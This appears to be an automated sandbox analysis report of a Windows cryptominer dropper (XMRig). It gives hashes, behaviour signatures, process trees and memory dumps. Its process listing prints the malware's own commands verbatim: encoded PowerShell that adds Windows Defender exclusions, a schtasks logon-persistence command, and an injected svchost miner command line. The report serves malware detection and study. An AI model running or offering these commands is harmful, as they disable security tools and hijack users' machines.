Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
30-11-2021 17:19
Static task
static1
General
-
Target
4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe
-
Size
5.4MB
-
MD5
5748009f0073ba952cbb581c44530798
-
SHA1
3304676ed8a238bf792a0fa359708861b3bfd42a
-
SHA256
4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06
-
SHA512
03b13118184ea701e9257e2e9cc9698dffadfcd42276a3771477c95ff6e4351500ce85563444ccc98f948ae91c1ed6f6969ad33437105016c74a7e96adf0febf
Malware Config
Signatures
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1224-299-0x0000000140310068-mapping.dmp xmrig behavioral1/memory/1224-301-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid process 3712 services64.exe 604 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 3712 set thread context of 1224 3712 services64.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exe4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exepowershell.exepowershell.exeservices64.exesvchost.exepid process 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe 2968 powershell.exe 2968 powershell.exe 2968 powershell.exe 64 powershell.exe 64 powershell.exe 64 powershell.exe 3712 services64.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe 1224 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exe4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exepowershell.exedescription pid process Token: SeDebugPrivilege 2540 powershell.exe Token: SeIncreaseQuotaPrivilege 2540 powershell.exe Token: SeSecurityPrivilege 2540 powershell.exe Token: SeTakeOwnershipPrivilege 2540 powershell.exe Token: SeLoadDriverPrivilege 2540 powershell.exe Token: SeSystemProfilePrivilege 2540 powershell.exe Token: SeSystemtimePrivilege 2540 powershell.exe Token: SeProfSingleProcessPrivilege 2540 powershell.exe Token: SeIncBasePriorityPrivilege 2540 powershell.exe Token: SeCreatePagefilePrivilege 2540 powershell.exe Token: SeBackupPrivilege 2540 powershell.exe Token: SeRestorePrivilege 2540 powershell.exe Token: SeShutdownPrivilege 2540 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeSystemEnvironmentPrivilege 2540 powershell.exe Token: SeRemoteShutdownPrivilege 2540 powershell.exe Token: SeUndockPrivilege 2540 powershell.exe Token: SeManageVolumePrivilege 2540 powershell.exe Token: 33 2540 powershell.exe Token: 34 2540 powershell.exe Token: 35 2540 powershell.exe Token: 36 2540 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1456 powershell.exe Token: SeSecurityPrivilege 1456 powershell.exe Token: SeTakeOwnershipPrivilege 1456 powershell.exe Token: SeLoadDriverPrivilege 1456 powershell.exe Token: SeSystemProfilePrivilege 1456 powershell.exe Token: SeSystemtimePrivilege 1456 powershell.exe Token: SeProfSingleProcessPrivilege 1456 powershell.exe Token: SeIncBasePriorityPrivilege 1456 powershell.exe Token: SeCreatePagefilePrivilege 1456 powershell.exe Token: SeBackupPrivilege 1456 powershell.exe Token: SeRestorePrivilege 1456 powershell.exe Token: SeShutdownPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeSystemEnvironmentPrivilege 1456 powershell.exe Token: SeRemoteShutdownPrivilege 1456 powershell.exe Token: SeUndockPrivilege 1456 powershell.exe Token: SeManageVolumePrivilege 1456 powershell.exe Token: 33 1456 powershell.exe Token: 34 1456 powershell.exe Token: 35 1456 powershell.exe Token: 36 1456 powershell.exe Token: SeDebugPrivilege 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeIncreaseQuotaPrivilege 2968 powershell.exe Token: SeSecurityPrivilege 2968 powershell.exe Token: SeTakeOwnershipPrivilege 2968 powershell.exe Token: SeLoadDriverPrivilege 2968 powershell.exe Token: SeSystemProfilePrivilege 2968 powershell.exe Token: SeSystemtimePrivilege 2968 powershell.exe Token: SeProfSingleProcessPrivilege 2968 powershell.exe Token: SeIncBasePriorityPrivilege 2968 powershell.exe Token: SeCreatePagefilePrivilege 2968 powershell.exe Token: SeBackupPrivilege 2968 powershell.exe Token: SeRestorePrivilege 2968 powershell.exe Token: SeShutdownPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeSystemEnvironmentPrivilege 2968 powershell.exe Token: SeRemoteShutdownPrivilege 2968 powershell.exe Token: SeUndockPrivilege 2968 powershell.exe Token: SeManageVolumePrivilege 2968 powershell.exe Token: 33 2968 powershell.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.execmd.execmd.execmd.exeservices64.execmd.exesihost64.exedescription pid process target process PID 2460 wrote to memory of 2212 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 2460 wrote to memory of 2212 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 2212 wrote to memory of 2540 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 2540 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 1456 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 1456 2212 cmd.exe powershell.exe PID 2460 wrote to memory of 1440 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 2460 wrote to memory of 1440 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 1440 wrote to memory of 1724 1440 cmd.exe schtasks.exe PID 1440 wrote to memory of 1724 1440 cmd.exe schtasks.exe PID 2460 wrote to memory of 4056 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 2460 wrote to memory of 4056 2460 4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe cmd.exe PID 4056 wrote to memory of 3712 4056 cmd.exe services64.exe PID 4056 wrote to memory of 3712 4056 cmd.exe services64.exe PID 3712 wrote to memory of 1476 3712 services64.exe cmd.exe PID 3712 wrote to memory of 1476 3712 services64.exe cmd.exe PID 1476 wrote to memory of 2968 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 2968 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 64 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 64 1476 cmd.exe powershell.exe PID 3712 wrote to memory of 604 3712 services64.exe sihost64.exe PID 3712 wrote to memory of 604 3712 services64.exe sihost64.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 3712 wrote to memory of 1224 3712 services64.exe svchost.exe PID 604 wrote to memory of 580 604 sihost64.exe conhost.exe PID 604 wrote to memory of 580 604 sihost64.exe conhost.exe PID 604 wrote to memory of 580 604 sihost64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe"C:\Users\Admin\AppData\Local\Temp\4535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\services64.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Microsoft\services64.exeC:\Users\Admin\Microsoft\services64.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "mlqowtwyezocuz"5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe rdwexnmbexgwvux0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3EYEaWtdTNgeO+yOcML2FLdin0Rbrrbm/YoAjK7mqvZEX/HgK//sgsnHcQsRkM9iGKCen+11TiuyHWyZAdf1wMLE4agYXDET+uLyuqzRfvjrbqdOzrMw7uyk9GJnctDF8x49xwghsNTxALZT8Q9OM4wOBYwE039IMn9ca6XIbihdWj5HyYAJaQbSZphwh7fCuYt0jnCH0tNapinYPmpr65hdz5iy8i4gYX/G2mW0bWM7v5yf7/M2g2SVIovCp85oojSagGHvGHL9NSpcgvmBfYrdWxs22CrpiqlLHwgNqOtzxdN5e8kce4ENimY0bna8qreUya9Oikcj5lQ/56VmmV9Rh/Te8Hm+EfV7aQGkEt7MvpdIliJYJQpq2Rqw4034WTmYmYIyNc1KTfSbRTTojhYmzmEfUwH1A/sCOYdzo1OYQdU8gUbDvK3Kvse8WXom5OTFAiqYFmnf8ovp3DqBcmGqaVa1ozl51yTYaQREubTK3akW3GhtG5yyHb2vOLHgRrAgqZDab/X7gLYtnofzkqda7eCFUGhOiP05JYct6ux4⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2008e242410616dab05525524eef385a
SHA19933e68aa099f8b77139163b339a263c688eee22
SHA25674be9a0971e76ae15973c2b4dda0bbc007d8bec24519108456261c0fe04f5784
SHA512c1976151171f04d60817653ea27975f73d87d578c1155e83d91bf4e33f022ef9e6d6f546feb9ab629c2c94d08c75d5412afb0143e5ffc8e30ff659fe2502aa53
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
ea97ef9d0172a5d0086020a980577d4f
SHA16392764ce55d033d34e6fbb94f513755ee4fe337
SHA2563eb95513beeb75fb3b27bc6e5f0df9c85cb1e940be2c6298665864c311373a23
SHA5122797b78f5a8cc4d8ecc4cc88057e489dc4efed2a141fbf0111d087f652763f954dcfb90cc20a86789bd3095c40067024b164024c11f55c5e44e61e6e795bede5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0827bc01e200d969ebb527ed6c762d7d
SHA10aad14d14a5809f3291bd0f5b73286d775329116
SHA256e963fec4d6d8df5b702d932559450f6cdae4afebcc91e1b829f31ab983b1c7e9
SHA512faaff6e4658d0f05306398a76fc8e62dd0409ad2c14ae073e548c80396280ce774d2979b3cb4027b0f9dff1e8cdf88203e7c9aa502ea9cde177b7813d3bb885d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exeMD5
9f196bd28274bbf24456746341db2b25
SHA13bd9a482dc88a6bd42465cb37c3d288a180386e0
SHA256ee183792c122aed123b5b7e111911a5d61fef56053449d5cc11c262c1315c9cc
SHA5125e2753c621534b14e5457ca81246cc17b00b55facc4a733d87e094ee63fb5afc51273d3a2ea94207abf01e211e911e2cd33f7895a3d13266c9544b87a39b4b56
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exeMD5
9f196bd28274bbf24456746341db2b25
SHA13bd9a482dc88a6bd42465cb37c3d288a180386e0
SHA256ee183792c122aed123b5b7e111911a5d61fef56053449d5cc11c262c1315c9cc
SHA5125e2753c621534b14e5457ca81246cc17b00b55facc4a733d87e094ee63fb5afc51273d3a2ea94207abf01e211e911e2cd33f7895a3d13266c9544b87a39b4b56
-
C:\Users\Admin\Microsoft\services64.exeMD5
5748009f0073ba952cbb581c44530798
SHA13304676ed8a238bf792a0fa359708861b3bfd42a
SHA2564535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06
SHA51203b13118184ea701e9257e2e9cc9698dffadfcd42276a3771477c95ff6e4351500ce85563444ccc98f948ae91c1ed6f6969ad33437105016c74a7e96adf0febf
-
C:\Users\Admin\Microsoft\services64.exeMD5
5748009f0073ba952cbb581c44530798
SHA13304676ed8a238bf792a0fa359708861b3bfd42a
SHA2564535de41278b2d4487e8f51de5851d8623de81e68060fe42d9ecb2cc23c4ed06
SHA51203b13118184ea701e9257e2e9cc9698dffadfcd42276a3771477c95ff6e4351500ce85563444ccc98f948ae91c1ed6f6969ad33437105016c74a7e96adf0febf
-
memory/64-264-0x000001F3CE0F0000-0x000001F3CE0F2000-memory.dmpFilesize
8KB
-
memory/64-295-0x000001F3CE0F8000-0x000001F3CE0F9000-memory.dmpFilesize
4KB
-
memory/64-254-0x0000000000000000-mapping.dmp
-
memory/64-266-0x000001F3CE0F3000-0x000001F3CE0F5000-memory.dmpFilesize
8KB
-
memory/64-293-0x000001F3CE0F6000-0x000001F3CE0F8000-memory.dmpFilesize
8KB
-
memory/580-313-0x00000134FE513000-0x00000134FE515000-memory.dmpFilesize
8KB
-
memory/580-306-0x00000134E4090000-0x00000134E4097000-memory.dmpFilesize
28KB
-
memory/580-312-0x00000134FE510000-0x00000134FE512000-memory.dmpFilesize
8KB
-
memory/580-314-0x00000134FE516000-0x00000134FE517000-memory.dmpFilesize
4KB
-
memory/604-294-0x0000000000000000-mapping.dmp
-
memory/1224-302-0x000002AE44E50000-0x000002AE44E70000-memory.dmpFilesize
128KB
-
memory/1224-301-0x0000000140000000-0x0000000140787000-memory.dmpFilesize
7.5MB
-
memory/1224-299-0x0000000140310068-mapping.dmp
-
memory/1224-315-0x000002AE44E90000-0x000002AE44EB0000-memory.dmpFilesize
128KB
-
memory/1440-202-0x0000000000000000-mapping.dmp
-
memory/1456-177-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-163-0x0000000000000000-mapping.dmp
-
memory/1456-167-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-168-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-165-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-171-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-172-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1456-205-0x000001EBF47C8000-0x000001EBF47C9000-memory.dmpFilesize
4KB
-
memory/1456-175-0x000001EBF47C0000-0x000001EBF47C2000-memory.dmpFilesize
8KB
-
memory/1456-176-0x000001EBF47C3000-0x000001EBF47C5000-memory.dmpFilesize
8KB
-
memory/1456-204-0x000001EBF47C6000-0x000001EBF47C8000-memory.dmpFilesize
8KB
-
memory/1456-166-0x000001EBDC170000-0x000001EBDC172000-memory.dmpFilesize
8KB
-
memory/1476-213-0x0000000000000000-mapping.dmp
-
memory/1724-203-0x0000000000000000-mapping.dmp
-
memory/2212-121-0x0000000000000000-mapping.dmp
-
memory/2460-118-0x000000001C4E0000-0x000000001C8E3000-memory.dmpFilesize
4.0MB
-
memory/2460-120-0x0000000000AD0000-0x0000000000AD1000-memory.dmpFilesize
4KB
-
memory/2460-128-0x000000001C0C0000-0x000000001C0C2000-memory.dmpFilesize
8KB
-
memory/2460-129-0x000000001C0C3000-0x000000001C0C5000-memory.dmpFilesize
8KB
-
memory/2460-130-0x000000001C0C6000-0x000000001C0C7000-memory.dmpFilesize
4KB
-
memory/2460-126-0x0000000000D00000-0x0000000001107000-memory.dmpFilesize
4.0MB
-
memory/2540-131-0x000001AAF2E60000-0x000001AAF2E62000-memory.dmpFilesize
8KB
-
memory/2540-137-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-173-0x000001AAF2E68000-0x000001AAF2E69000-memory.dmpFilesize
4KB
-
memory/2540-122-0x0000000000000000-mapping.dmp
-
memory/2540-124-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-123-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-136-0x000001AAF3050000-0x000001AAF3051000-memory.dmpFilesize
4KB
-
memory/2540-135-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-125-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-134-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-133-0x000001AAF2EA0000-0x000001AAF2EA1000-memory.dmpFilesize
4KB
-
memory/2540-127-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-132-0x000001AAF2E63000-0x000001AAF2E65000-memory.dmpFilesize
8KB
-
memory/2540-162-0x000001AAF0F90000-0x000001AAF0F92000-memory.dmpFilesize
8KB
-
memory/2540-155-0x000001AAF2E66000-0x000001AAF2E68000-memory.dmpFilesize
8KB
-
memory/2968-214-0x0000000000000000-mapping.dmp
-
memory/2968-263-0x0000020A7CD58000-0x0000020A7CD59000-memory.dmpFilesize
4KB
-
memory/2968-261-0x0000020A7CD56000-0x0000020A7CD58000-memory.dmpFilesize
8KB
-
memory/2968-228-0x0000020A7CD53000-0x0000020A7CD55000-memory.dmpFilesize
8KB
-
memory/2968-226-0x0000020A7CD50000-0x0000020A7CD52000-memory.dmpFilesize
8KB
-
memory/3712-223-0x000000001C1D3000-0x000000001C1D5000-memory.dmpFilesize
8KB
-
memory/3712-207-0x0000000000000000-mapping.dmp
-
memory/3712-224-0x000000001C1D6000-0x000000001C1D7000-memory.dmpFilesize
4KB
-
memory/3712-221-0x000000001C1D0000-0x000000001C1D2000-memory.dmpFilesize
8KB
-
memory/4056-206-0x0000000000000000-mapping.dmp